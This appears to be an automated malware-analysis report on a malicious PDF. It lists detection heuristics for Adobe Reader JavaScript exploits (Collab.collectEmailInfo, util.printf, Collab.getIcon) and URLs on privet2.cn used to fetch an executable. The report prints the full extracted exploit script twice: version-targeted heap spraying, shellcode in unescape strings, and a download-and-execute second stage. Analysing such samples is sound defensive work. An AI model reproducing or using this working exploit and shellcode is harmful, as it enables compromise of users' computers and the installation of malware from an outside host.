MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_UNESCAPE rule firing suggests that the JavaScript is intentionally made difficult to read, likely to hide its malicious functionality. The extracted artifact 'javascript_obj0009_000.js' is the primary indicator of this obfuscated script. The script's purpose is to download and execute a second-stage payload, but its exact functionality is obscured. This leads to a moderate confidence in the assessment.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 8
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
JavaScript action low 3 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var GOK1kysFJaUm1a5bc = 0x0c0c0c0c; var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A … } -
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://privet2.cn/arend_nt/getexe.php?spl=pdf_email Referenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_prntfReferenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexe.php?spl=pdf_icnReferenced by PDF JavaScript
- http://privet2.cn/arend_nt/getexeReferenced by PDF JavaScript
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0009_000.js |
pdf-javascript-stream | PDF /JS object 9 at offset 0xD6 | 5791 bytes |
SHA-256: 13ebccabab6b75b4b75296cfa388e2c4a1eb39661aeb31d737c1518a42aad81f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var uBVnfXQQYFYuEE9nf = new Array();
var Axwtzru3e3tecWDn2;
var lave = eval;
function yTZRt9gR4vgBjM5gI(Gg0siovcTY9gLAgpj, CirpAukr7UDBBW0rf)
{
while(Gg0siovcTY9gLAgpj.length * 2 < CirpAukr7UDBBW0rf)
{
Gg0siovcTY9gLAgpj += Gg0siovcTY9gLAgpj;
}
Gg0siovcTY9gLAgpj = Gg0siovcTY9gLAgpj.substring(0, CirpAukr7UDBBW0rf / 2);
return Gg0siovcTY9gLAgpj;
}
function PaUyCxWLesVKhETQ7(Zb24S8XgJjCTbsVCN)
{
if(Zb24S8XgJjCTbsVCN == 0)
{
var GOK1kysFJaUm1a5bc = 0x0c0c0c0c;
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C");
}
else if(Zb24S8XgJjCTbsVCN == 1)
{
GOK1kysFJaUm1a5bc = 0x30303030;
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066");
}
else if(Zb24S8XgJjCTbsVCN == 2)
{
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E");
}
var aLWPbpz6c1ghcIph3 = 0x400000;
var FR6vOcwEe0RAkyh7U = b5jgk4PxW1p3CCWbX.length * 2;
var CirpAukr7UDBBW0rf = aLWPbpz6c1ghcIph3 - (FR6vOcwEe0RAkyh7U + 0x38);
var Gg0siovcTY9gLAgpj = unescape("%u9090%u9090");
Gg0siovcTY9gLAgpj = yTZRt9gR4vgBjM5gI(Gg0siovcTY9gLAgpj, CirpAukr7UDBBW0rf);
var viK7nw8UejmUQpzsv = (GOK1kysFJaUm1a5bc - 0x400000) / aLWPbpz6c1ghcIph3;
for(var NHXrWB1xMlv4rQ0Zk = 0; NHXrWB1xMlv4rQ0Zk < viK7nw8UejmUQpzsv; NHXrWB1xMlv4rQ0Zk++)
{
uBVnfXQQYFYuEE9nf[NHXrWB1xMlv4rQ0Zk] = Gg0siovcTY9gLAgpj + b5jgk4PxW1p3CCWbX;
}
}
function gNhNsM8fqYUqQQlix()
{
var TE0dBVO8YGYiqJzE1 = 0;
var F7NUlE3G5TgqBeTQn = app.viewerVersion.toString();
app.clearTimeOut(Axwtzru3e3tecWDn2);
if((F7NUlE3G5TgqBeTQn >= 8 && F7NUlE3G5TgqBeTQn < 8.102) || F7NUlE3G5TgqBeTQn < 7.1)
{
PaUyCxWLesVKhETQ7(0);
var WbJVjslHacaZqbwwz = unescape("%u0c0c%u0c0c");
while(WbJVjslHacaZqbwwz.length < 44952) WbJVjslHacaZqbwwz += WbJVjslHacaZqbwwz;
var MiDSyHwf98JcY8jAQ = this;
var QtI1BtclTTNPPMq9Z = Collab;
MiDSyHwf98JcY8jAQ["collabStore"] = QtI1BtclTTNPPMq9Z["collectEmailInfo"](
{
subj : "", msg : WbJVjslHacaZqbwwz
}
);
}
if((F7NUlE3G5TgqBeTQn >= 8.102 && F7NUlE3G5TgqBeTQn < 8.104) || (F7NUlE3G5TgqBeTQn >= 9 && F7NUlE3G5TgqBeTQn < 9.1) || F7NUlE3G5TgqBeTQn <= 7.101)
{
try
{
if(app.doc.Collab.getIcon)
{
PaUyCxWLesVKhETQ7(2);
var e8rFm1N7cvDL6eayx = unescape("%09");
while(e8rFm1N7cvDL6eayx.length < 0x4000)
{
e8rFm1N7cvDL6eayx += e8rFm1N7cvDL6eayx;
}
e8rFm1N7cvDL6eayx = "N." + e8rFm1N7cvDL6eayx;
var GAqDwJgJj7gZEGsL9 = app;
GAqDwJgJj7gZEGsL9["doc"]["Collab"]["getIcon"](e8rFm1N7cvDL6eayx);
TE0dBVO8YGYiqJzE1 = 1;
}
else
{
TE0dBVO8YGYiqJzE1 = 1;
}
}
catch(e)
{
TE0dBVO8YGYiqJzE1 = 1;
}
if(TE0dBVO8YGYiqJzE1 == 1)
{
if(F7NUlE3G5TgqBeTQn == 8.102 || F7NUlE3G5TgqBeTQn == 7.1)
{
PaUyCxWLesVKhETQ7(1);
var a90VElQS8V7hU4Ifu = "12999999999999999999";
for(CbDCvxIbWXsPs1X10 = 0; CbDCvxIbWXsPs1X10 < 276; CbDCvxIbWXsPs1X10++)
{
a90VElQS8V7hU4Ifu += "8";
}
var oFvTh4zokUs40mZk1 = util;
oFvTh4zokUs40mZk1["printf"]("%45000f", a90VElQS8V7hU4Ifu);
}
}
}
}
app.xfx5HUb0tUARVKTkG = gNhNsM8fqYUqQQlix;
Axwtzru3e3tecWDn2 = app.setTimeOut("app.xfx5HUb0tUARVKTkG()", 1);
|
|||
javascript_obj0009_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 | 276 bytes |
SHA-256: 53b3e4c7a38345353f3fa1ae4b7ff52d402e922a3c928c5080347dbe2dec1883 |
|||
javascript_obj0009_000_shellcode_01.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 | 276 bytes |
SHA-256: d3ec852c1d2decd4c16deaf172efa38de6b4ff01d8134aa8e996f13f2df4eb41 |
|||
javascript_obj0009_000_shellcode_02.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 9 at offset 0xD6 | 274 bytes |
SHA-256: 12ed26cd8dd7e85424451cd7e17e925b4b010481b1a4fd61291904ff3ca0143d |
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6 | 5787 bytes |
SHA-256: 262e5a6f4e2c6c945274810a161bdbc6eab4b17abd3ee2d4733405f028f3cedc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var uBVnfXQQYFYuEE9nf = new Array();
var Axwtzru3e3tecWDn2;
var lave = eval;
function yTZRt9gR4vgBjM5gI(Gg0siovcTY9gLAgpj, CirpAukr7UDBBW0rf)
{
while(Gg0siovcTY9gLAgpj.length * 2 < CirpAukr7UDBBW0rf)
{
Gg0siovcTY9gLAgpj += Gg0siovcTY9gLAgpj;
}
Gg0siovcTY9gLAgpj = Gg0siovcTY9gLAgpj.substring(0, CirpAukr7UDBBW0rf / 2);
return Gg0siovcTY9gLAgpj;
}
function PaUyCxWLesVKhETQ7(Zb24S8XgJjCTbsVCN)
{
if(Zb24S8XgJjCTbsVCN == 0)
{
var GOK1kysFJaUm1a5bc = 0x0c0c0c0c;
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6D65%u6961%u006C");
}
else if(Zb24S8XgJjCTbsVCN == 1)
{
GOK1kysFJaUm1a5bc = 0x30303030;
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7270%u746E%u0066");
}
else if(Zb24S8XgJjCTbsVCN == 2)
{
var b5jgk4PxW1p3CCWbX = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u702F%u6972%u6576%u3274%u632E%u2F6E%u7261%u6E65%u5F64%u746E%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6369%u006E");
}
var aLWPbpz6c1ghcIph3 = 0x400000;
var FR6vOcwEe0RAkyh7U = b5jgk4PxW1p3CCWbX.length * 2;
var CirpAukr7UDBBW0rf = aLWPbpz6c1ghcIph3 - (FR6vOcwEe0RAkyh7U + 0x38);
var Gg0siovcTY9gLAgpj = unescape("%u9090%u9090");
Gg0siovcTY9gLAgpj = yTZRt9gR4vgBjM5gI(Gg0siovcTY9gLAgpj, CirpAukr7UDBBW0rf);
var viK7nw8UejmUQpzsv = (GOK1kysFJaUm1a5bc - 0x400000) / aLWPbpz6c1ghcIph3;
for(var NHXrWB1xMlv4rQ0Zk = 0; NHXrWB1xMlv4rQ0Zk < viK7nw8UejmUQpzsv; NHXrWB1xMlv4rQ0Zk++)
{
uBVnfXQQYFYuEE9nf[NHXrWB1xMlv4rQ0Zk] = Gg0siovcTY9gLAgpj + b5jgk4PxW1p3CCWbX;
}
}
function gNhNsM8fqYUqQQlix()
{
var TE0dBVO8YGYiqJzE1 = 0;
var F7NUlE3G5TgqBeTQn = app.viewerVersion.toString();
app.clearTimeOut(Axwtzru3e3tecWDn2);
if((F7NUlE3G5TgqBeTQn >= 8 && F7NUlE3G5TgqBeTQn < 8.102) || F7NUlE3G5TgqBeTQn < 7.1)
{
PaUyCxWLesVKhETQ7(0);
var WbJVjslHacaZqbwwz = unescape("%u0c0c%u0c0c");
while(WbJVjslHacaZqbwwz.length < 44952) WbJVjslHacaZqbwwz += WbJVjslHacaZqbwwz;
var MiDSyHwf98JcY8jAQ = this;
var QtI1BtclTTNPPMq9Z = Collab;
MiDSyHwf98JcY8jAQ["collabStore"] = QtI1BtclTTNPPMq9Z["collectEmailInfo"](
{
subj : "", msg : WbJVjslHacaZqbwwz
}
);
}
if((F7NUlE3G5TgqBeTQn >= 8.102 && F7NUlE3G5TgqBeTQn < 8.104) || (F7NUlE3G5TgqBeTQn >= 9 && F7NUlE3G5TgqBeTQn < 9.1) || F7NUlE3G5TgqBeTQn <= 7.101)
{
try
{
if(app.doc.Collab.getIcon)
{
PaUyCxWLesVKhETQ7(2);
var e8rFm1N7cvDL6eayx = unescape(" ");
while(e8rFm1N7cvDL6eayx.length < 0x4000)
{
e8rFm1N7cvDL6eayx += e8rFm1N7cvDL6eayx;
}
e8rFm1N7cvDL6eayx = "N." + e8rFm1N7cvDL6eayx;
var GAqDwJgJj7gZEGsL9 = app;
GAqDwJgJj7gZEGsL9["doc"]["Collab"]["getIcon"](e8rFm1N7cvDL6eayx);
TE0dBVO8YGYiqJzE1 = 1;
}
else
{
TE0dBVO8YGYiqJzE1 = 1;
}
}
catch(e)
{
TE0dBVO8YGYiqJzE1 = 1;
}
if(TE0dBVO8YGYiqJzE1 == 1)
{
if(F7NUlE3G5TgqBeTQn == 8.102 || F7NUlE3G5TgqBeTQn == 7.1)
{
PaUyCxWLesVKhETQ7(1);
var a90VElQS8V7hU4Ifu = "12999999999999999999";
for(CbDCvxIbWXsPs1X10 = 0; CbDCvxIbWXsPs1X10 < 276; CbDCvxIbWXsPs1X10++)
{
a90VElQS8V7hU4Ifu += "8";
}
var oFvTh4zokUs40mZk1 = util;
oFvTh4zokUs40mZk1["printf"]("E000f", a90VElQS8V7hU4Ifu);
}
}
}
}
app.xfx5HUb0tUARVKTkG = gNhNsM8fqYUqQQlix;
Axwtzru3e3tecWDn2 = app.setTimeOut("app.xfx5HUb0tUARVKTkG()", 1);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.